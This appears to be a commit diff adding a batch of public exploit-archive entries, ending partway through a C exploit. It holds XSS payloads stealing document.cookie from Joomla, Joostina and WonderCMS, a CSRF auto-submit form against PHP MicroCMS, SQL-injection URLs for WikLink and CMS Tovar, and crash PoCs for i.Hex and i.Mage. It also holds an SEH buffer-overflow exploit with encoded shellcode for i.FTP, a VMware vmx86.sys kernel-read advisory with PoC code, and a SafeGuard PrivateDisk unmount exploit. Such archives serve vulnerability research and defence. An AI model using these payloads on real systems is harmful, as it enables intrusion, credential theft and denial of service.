The Joomla! Search component is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%

17
platforms/php/webapps/35172.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/45702/info
PHP MicroCMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP MicroCMS 1.0.1 is vulnerable; other versions may be affected.
<form action="http://host/index.php?admin=static_pages_edit&pk=home" method="post" name="main">
<input type="hidden" name="pk" value="home">
<input type="hidden" name="page_title" value="Welcome to PHP MicroCMS">
<input type="hidden" name="page_text" value="text<script>alert(document.cookie)</script>">
<input type="hidden" name="subSavePage" value="Save Changes">
</form>
<script>
document.main.submit();
</script>

9
platforms/php/webapps/35185.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45712/info
WonderCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WonderCMS 0.3.3 is vulnerable; prior versions may also be affected.
http://www.example.com/editText.php?fieldname=slogan&content=slogan<img src=x onerror=alert("XSS")>

10
platforms/php/webapps/35186.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45731/info
WikLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
WikLink 0.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/editCategory.php?action=edit&fold=9999'%20union%20select%201,2,3,4/*
http://www.example.com/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/*

10
platforms/php/webapps/35187.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45732/info
Joostina is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Joostina versions 1.3.0 and prior are vulnerable.
http://www.example.com/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22

7
platforms/php/webapps/35191.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45772/info
CMS Tovar is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/tovar.php?id=-294+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())josalijoe,6,7,8,9--

44
platforms/windows/dos/35178.py Executable file
View file

@ -0,0 +1,44 @@
#!/usr/bin/python
#Exploit Title:i.Hex Local Crash Poc
#Homepage:http://www.memecode.com/ihex.php
#Software Link:www.memecode.com/data/ihex-win32-v0.98.exe
#Version:i.Hex-v0.98 (Win32 Release)
#Description:i.Hex is a small and free graphical Hex Editor for Windows..
#Tested on:Win7 32bit
#Exploit Author:metacom --> twitter.com/m3tac0m
#Date:05.11.2014
'''
Immunity Debugger Log data
EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01363FA0
ESP 0012F6D8
EBP 0012F700
ESI 0135B8F0
EDI 005F0000
EIP 77B85FBD ntdll.77B85FBD
Press Shift+9
Log data, item 0
Address=77B85B44
Message=[15:56:05] Access violation when reading [41414141]
'''
print "\n[*]Vulnerable Created iHex.xml!"
print "[*]Copy iHex.xml to C:\Program Files\Memecode\i.Hex"
print "[*]Start i.Hex"
print "[*]------------------------------------------------"
poc="\x41" * 100000
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x49\x73\x48\x65\x78\x3d\x22\x31\x22\x0a\x09"
header += "\x20\x4c\x69\x74\x74\x6c\x65\x45\x6e\x64\x69\x61\x6e\x3d\x22\x0a" + poc
footer = "\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x31\x30\x30\x2c\x31\x30\x30\x2c\x35\x30\x30\x2c\x34\x30\x30\x22\x3e\x0a\x09\x3c\x4d"
footer += "\x72\x75\x20\x49\x74\x65\x6d\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f"
footer += "\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"
payload= header + footer
# Write out our malicious file
writeFile = open ("iHex.xml", "wb")
writeFile.write( payload )
writeFile.close()

46
platforms/windows/dos/35179.py Executable file
View file

@ -0,0 +1,46 @@
#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Homepage:http://www.memecode.com/image.php
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download
#Version:i.i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate
#Exploit Author: metacom
#Date:26.10.2014
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]
EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
print "\n[*]Vulnerable Created image.xml!"
print "[*]Copy image.xml to C:\Program Files\Memecode\i.Mage"
print "[*]Start i.Mage"
print "[*]------------------------------------------------"
poc="\x41" * 200000
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc
footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"
payload=header + footer
writeFile = open ("image.xml", "w")
writeFile.write( payload )
writeFile.close()

295
platforms/windows/dos/35182.txt Executable file
View file

@ -0,0 +1,295 @@
Title: VMWare vmx86.sys Arbitrary Kernel Read
Advisory ID: KL-001-2014-004
Publication Date: 2014.11.04
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-004.txt
1. Vulnerability Details
Affected Vendor: VMWare
Affected Product: Workstation
Affected Version: 10.0.0.40273
Platform: Microsoft Windows XP SP3 x86, Microsoft Windows Server 2003 SP2 x86, Microsoft Windows 7 SP1 x86
CWE Classification: CWE-20: Improper Input Validation
Impact: Arbitrary Read, Denial-of-Service
Attack vector: IOCTL
2. Vulnerability Description
A vulnerability within the vmx86 driver allows an attacker
to specify a memory address within the kernel and have the
memory stored at that address be returned to the attacker.
3. Technical Description
The first four bytes of the InputBuffer parameter passed
to DeviceIoControl is used as the source parameter in a memcpy
call. The InputBuffer must be a minimum of eight bytes long in
order to trigger the vulnerability. The OutputBuffer parameter
passed to DeviceIoControl is used as the destination address
for the output from the DeviceIoControl call. In this case,
the data returned is the same data residing at the source
paramter of memcpy. This can therefore be abused in a way
that allows an attacker to arbitrarily define a kernel address,
and have the memory stored at that address be returned to the
attacker at an address residing in userland.
Probably caused by : vmx86.sys ( vmx86+bd6 )
Followup: MachineOwner
---------
kd> .symfix;.reload;!analyze -v
Loading Kernel Symbols
...............................................................
................................................................
...................................................
Loading User Symbols
.........................
Loading unloaded module list
.....
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffff0000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 82c727f3, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
READ_ADDRESS: ffff0000
FAULTING_IP:
nt!memcpy+33
82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: python.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.16384 (debuggers(dbg).130821-1623) x86fre
TRAP_FRAME: 822e47dc -- (.trap 0xffffffff822e47dc)
ErrCode = 00000000
eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000
eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
nt!memcpy+0x33:
82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER: from 82c7a3d8 to 82cc741b
STACK_TEXT:
822e47c4 82c7a3d8 00000000 ffff0000 00000000 nt!MmAccessFault+0x106
822e47c4 82c727f3 00000000 ffff0000 00000000 nt!KiTrap0E+0xdc
822e4858 93572bd6 856a9000 ffff0000 00002000 nt!memcpy+0x33
822e48cc 9357329a 856a9000 00000008 856a9000 vmx86+0xbd6
822e48f8 82c70593 86f0d030 87433540 87433540 vmx86+0x129a
822e4910 82e6499f 871f8b08 87433540 874335b0 nt!IofCallDriver+0x63
822e4930 82e67b71 86f0d030 871f8b08 00000000 nt!IopSynchronousServiceTail+0x1f8
822e49cc 82eae3f4 86f0d030 87433540 00000000 nt!IopXxxControlFile+0x6aa
822e4a00 821210fa 0000007c 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
822e4b14 82cb7685 00000000 00000000 00000000 nt!KiDeliverApc+0x17f
822e4b58 82cb64f7 00000000 85689a10 80000000 nt!KiSwapThread+0x24e
822e4b80 82cb61d5 85689a10 85689ad0 0000008a nt!KiCommitThreadWait+0x1df
822e4bd8 82e639fd 01b1fd01 00000001 822e4bc8 nt!KeDelayExecutionThread+0x2aa
822e4c24 82c771ea 00000001 01b1ff54 01b1ff78 nt!NtDelayExecution+0x8d
822e4c24 777c70b4 00000001 01b1ff54 01b1ff78 nt!KiFastCallEntry+0x12a
01b1ff0c 777c57d4 75a31876 00000001 01b1ff54 ntdll!KiFastSystemCallRet
01b1ff10 75a31876 00000001 01b1ff54 da57de5e ntdll!NtDelayExecution+0xc
01b1ff78 00401ed6 ffffffff 00000001 01b1ff94 KERNELBASE!SleepEx+0x65
01b1ff94 777e37f5 00000000 762fe46a 00000000 kernel32!BaseThreadInitThunk+0xe
01b1ffd4 777e37c8 00401ec0 00000000 00000000 ntdll!__RtlUserThreadStart+0x70
01b1ffec 00000000 00401ec0 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: kb
FOLLOWUP_IP:
vmx86+bd6
93572bd6 83c40c add esp,0Ch
SYMBOL_STACK_INDEX: 3
SYMBOL_NAME: vmx86+bd6
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vmx86
IMAGE_NAME: vmx86.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 539a4f4e
FAILURE_BUCKET_ID: 0x50_vmx86+bd6
BUCKET_ID: 0x50_vmx86+bd6
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:0x50_vmx86+bd6
FAILURE_ID_HASH: {fc58ae86-f23c-59c4-2a6e-428433bd6080}
Followup: MachineOwner
---------
kd> .frame /c 04; .cxr; .frame /c 03; .cxr; .frame /c 02
04 822e48f8 82c70593 vmx86+0x129a
eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000
eip=9357329a esp=822e48d4 ebp=822e48f8 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
vmx86+0x129a:
9357329a eb63 jmp vmx86+0x12ff (935732ff)
Resetting default scope
03 822e48cc 9357329a vmx86+0xbd6
eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000
eip=93572bd6 esp=822e4860 ebp=822e48cc iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
vmx86+0xbd6:
93572bd6 83c40c add esp,0Ch
Resetting default scope
02 822e4858 93572bd6 nt!memcpy+0x33
eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000
eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212
nt!memcpy+0x33:
82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
By using the provided proof-of-concept code, an attacker
can read data from arbitrary kernel memory addresses. As an
example, the value of the first entry in HalDispatchTable is
read. Below is the debugger output, followed by the stdout
from the proof-of-concept code.
0:000> g
ModLoad: 76170000 7618f000 C:\Windows\system32\IMM32.DLL
ModLoad: 77600000 776cc000 C:\Windows\system32\MSCTF.dll
ModLoad: 1d1a0000 1d1b8000 C:\Python27\DLLs\_ctypes.pyd
ModLoad: 77440000 7759c000 C:\Windows\system32\ole32.dll
ModLoad: 75c60000 75cef000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 77950000 77955000 C:\Windows\system32\Psapi.DLL
ModLoad: 01980000 01d92000 C:\Windows\system32\ntkrnlpa.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
eax=00000000 ebx=00000000 ecx=0021fe68 edx=00000020 esi=778e7380 edi=778e7340
eip=778570b4 esp=0021feb8 ebp=0021fed4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
778570b4 c3 ret
0:000> db 0x25 L?0x4
00000025 a2 68 04 83
[+] Handle \\.\vmx86 @ 120
[+] HalDispatchTable+0x4(0x82d383fc) == 830468a2
4. Mitigation and Remediation Recommendation
A patch is not likely to be forthcoming from the vendor. It
is recommended not to allow users access to the __vmware__
group unless they are trusted with LocalSystem privileges.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.08.08 - Initial contact; sent VMWare report and PoC.
2014.08.08 - VMWare acknowledges receipt of vulnerability
report.
2014.08.15 - VMWare asks for clarification on the PoC.
2014.08.18 - KoreLogic responds to VMWare's request.
2014.08.18 - VMWare counters that it is the expected behavior
for members of the __vmware__ group to be able to
read arbitrary memory. Asks KoreLogic to describe
the "actionable security item here."
2014.08.20 - KoreLogic advises VMWare that providing non-admin
user accounts with the unmitigated ability to dump
the contents of the kernel memory is a security
risk.
2014.08.20 - VMWare suggests modifying the documentation
describing the capabilities of the __vmware__
group as a solution.
2014.08.21 - KoreLogic provides VMWare with a mitigation
strategy and describes how to patch the
vulnerability. KoreLogic requests that a CVE be
issued.
2014.08.25 - VMware states they will continue to review the
vulnerability details.
2014.09.24 - KoreLogic informs VMWare that 30 business days
have passed since vendor acknowledgement of the
initial report. KoreLogic requests CVE number for
the vulnerability, if there is one. KoreLogic also
requests vendor's public identifier for the
vulnerability along with the expected disclosure
date.
2014.09.26 - VMWare responds that they will contact KoreLogic
"next week."
2014.10.08 - KoreLogic reaches out to VMWare as more than 1 week
has elapsed since the last response.
2014.10.13 - VMWare responds that they have decided the reported
vulnerability is not a security issue. VMWare
creates a Knowledge Base article comparing the
__vmware__ group to a Microsoft Windows Power User
account.
2014.10.14 - 45 business days have elapsed since the
vulnerability was reported to VMWare.
2014.10.14 - KoreLogic requests a CVE for this vulnerability
report.
2014.10.22 - MITRE asks KoreLogic to clarify the vendor's
response to the KoreLogic report.
2014.10.22 - KoreLogic responds with a summary of VMWare's
responses to the KoreLogic report.
2014.10.22 - MITRE responds that there will be no CVE issued for
this report, as the vendor is "entitled to define a
security policy in which this read access is
considered an acceptable risk."
2014.11.04 - Public disclosure.
7. Proof of Concept
The code presented below will trigger the issue by forcing
memory to be read from a blatantly invalid address of
0xffff0000.
#!/usr/bin/python2
#
# KL-001-2014-004 : VMWare vmx86.sys Arbitrary Kernel Read
# Matt Bergin (KoreLogic / Smash the Stack)
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
from binascii import hexlify
from re import findall
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle
VirtualProtect,ReadProcessMemory = windll.kernel32.VirtualProtect,windll.kernel32.ReadProcessMemory
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
handle = CreateFileA("\\\\.\\vmx86",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[!] Could not open handle, is user part of the __vmware__ group?"
exit(1)
print "[+] Handle \\\\.\\vmx86 @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0x100)),0x1000|0x2000,0x40)
buf = pack('<L',0xcccccccc)*100
WriteProcessMemory(-1,0x100,buf,len(buf),byref(c_int(0)))
inputBuffer = pack('<L',0xffff0000) + pack('<L',0x41414141)
DeviceIoControlFile(handle,0,0,0,byref(c_ulong(8)),0x81014008,inputBuffer,len(inputBuffer),0x75,0xff)
if (GetLastError() != 0):
print "[!] caught an error while executing the IOCTL - %s." % (hex(GetLastError()))
exit(1)
CloseHandle(handle)
The contents of this advisory are copyright(c) 2014
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

73
platforms/windows/local/35177.py Executable file
View file

@ -0,0 +1,73 @@
#!/usr/bin/python
#Exploit Title:i-FTP Buffer Overflow SEH
#Homepage:http://www.memecode.com/iftp.php
#Software Link:www.memecode.com/data/iftp-win32-v220.exe
#Version:i.Ftp v2.20 (Win32 Release)
#Vulnerability discovered:26.10.2014
#Description:Simple portable cross platform FTP/SFTP/HTTP client.
#Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
#Exploit Author:metacom --> twitter.com/m3tac0m
import struct
def little_endian(address):
return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)#1004C31F 5E POP ESI
poc+="\x90" * 80
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R
#| msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c
poc+=("\x89\xe7\xda\xce\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4d\x59\x35\x50"
"\x53\x30\x55\x50\x43\x50\x4d\x59\x4d\x35\x46\x51\x39\x42\x55"
"\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b"
"\x51\x42\x32\x34\x4c\x4b\x54\x32\x31\x38\x44\x4f\x58\x37\x30"
"\x4a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x57\x4c"
"\x33\x51\x43\x4c\x44\x42\x46\x4c\x31\x30\x4f\x31\x58\x4f\x44"
"\x4d\x45\x51\x38\x47\x5a\x42\x5a\x50\x31\x42\x46\x37\x4c\x4b"
"\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x48\x50\x4c"
"\x4b\x51\x50\x44\x38\x4b\x35\x39\x50\x44\x34\x30\x4a\x53\x31"
"\x48\x50\x46\x30\x4c\x4b\x51\x58\x35\x48\x4c\x4b\x51\x48\x57"
"\x50\x45\x51\x58\x53\x4b\x53\x47\x4c\x47\x39\x4c\x4b\x37\x44"
"\x4c\x4b\x53\x31\x58\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e"
"\x4c\x59\x51\x58\x4f\x54\x4d\x43\x31\x39\x57\x56\x58\x4b\x50"
"\x33\x45\x4b\x44\x43\x33\x43\x4d\x5a\x58\x47\x4b\x53\x4d\x31"
"\x34\x52\x55\x4a\x42\x50\x58\x4c\x4b\x50\x58\x57\x54\x43\x31"
"\x49\x43\x55\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45"
"\x4c\x55\x51\x58\x53\x4c\x4b\x34\x44\x4c\x4b\x43\x31\x38\x50"
"\x4c\x49\x30\x44\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x51\x4a\x36\x31\x4b\x4f\x4b\x50\x36\x38\x51\x4f\x51\x4a"
"\x4c\x4b\x55\x42\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x53\x31\x4c"
"\x4d\x4b\x35\x58\x39\x33\x30\x35\x50\x33\x30\x56\x30\x33\x58"
"\x30\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4b"
"\x4e\x44\x4e\x56\x52\x5a\x4a\x53\x58\x39\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x34\x46\x33\x4c\x54\x4a\x4b"
"\x30\x4b\x4b\x4b\x50\x53\x45\x45\x55\x4f\x4b\x50\x47\x52\x33"
"\x42\x52\x42\x4f\x42\x4a\x55\x50\x31\x43\x4b\x4f\x4e\x35\x53"
"\x53\x55\x31\x32\x4c\x45\x33\x46\x4e\x52\x45\x44\x38\x52\x45"
"\x55\x50\x41\x41")
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "Schedule.xml"
file = open(filename , "w")
file.write(exploit)
print "\n[*]Vulnerable Created Schedule.xml!"
print "[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp"
print "[*]Start IFTP"
print "[*]----------------------------------------------------"
file.close()
print '''
[+]Second Vulnerability
[-]You can also enter the contents 20000 A of the file in the -->
* HTTP -> HTTP Download --> Option "FILE" to cause this crash
* Access violation - code c0000005 (!!! second chance !!!)
* 0:003> !exchain
* 016fff2c: 41414141
* Invalid exception stack at 41414141'''

103
platforms/windows/local/35189.c Executable file
View file

@ -0,0 +1,103 @@
source: http://www.securityfocus.com/bid/45749/info
SafeGuard PrivateDisk is prone to multiple local security-bypass vulnerabilities.
Attackers with physical access to a computer with the affected application installed can exploit these issues to bypass certain security restrictions and perform unauthorized actions.
SafeGuard PrivateDisk 2.0 and 2.3 are vulnerable; other versions may also be affected.
/* safeguard-pdisk-unmount.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk unmount exploit
* by mu-b - Wed 05 Mar 2008
*
* - Tested on: privatediskm.sys 2.2.0.16
* (<= Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk 2.0)
* privatediskm.sys
* (<= Sophos - SafeGuard PrivateDisk 2.3)
*
* This exploit 'tunnels' an ioctl request to the mounted volume device
* for the volume file given in the argument, the request will forcibly
* unmount the device.
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ddk/ntapi.h>
#define SGPD_UNMOUNT_IOCTL 0x0007200C
#define SGPD_MAX_SESSION_ID 0xFFFFF
struct ioctl_req {
int session_id;
char volume_buf[0x200];
};
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD i, j, rlen;
CHAR buf[0x100];
HANDLE hFile;
BOOL result;
printf ("Utimaco Safeware AG - SafeGuard PrivateDisk unmount exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <volume file>\n", argv[0]);
exit (EXIT_SUCCESS);
}
hFile = CreateFileA ("\\\\.\\PrivateDisk", GENERIC_READ,
